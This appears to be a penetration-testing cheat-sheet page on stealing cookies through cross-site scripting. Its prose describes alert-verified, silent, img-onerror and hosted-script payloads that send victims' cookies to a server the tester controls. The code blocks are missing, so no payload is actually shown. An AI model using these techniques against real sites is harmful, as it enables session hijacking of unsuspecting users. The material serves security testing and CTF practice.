Stealing Cookies
Stealing cookies to obtain privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities.
Payloads
Verification with alert()
This payload will pop an alert() box prior to sending the cookie. This can be usefuil for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the alert() box closes, the cookie will be sent to the arbitrary server:
Exfiltrating cookies without alert()
After verifying that the parameter is susceptible to cross-site scripting, we can leverage the following payload to exfiltrate cookies silently:
CTF Only Payload
The following payload leverages the img tag rather then script and will call onerror() in a loop, ultimately filling up your server with cookies. I have found this can be life-saving in a CTF when things may not be working as the author originally intended:
My Preferred Method
The way that I like to go about capturing cookies is submitting the following payload, calling back to a JavaScript file that I am host on a Python web server:
The xss.js file looks like the following, ultimately it is doing the same as the above payloads by grabbing and sending the cookies to my hosted web server:
Capturing the Cookies
Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or controlled Burp collaborator instance. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That being said, there are sites that exist such as requestbin to send the request to:
References
Last updated
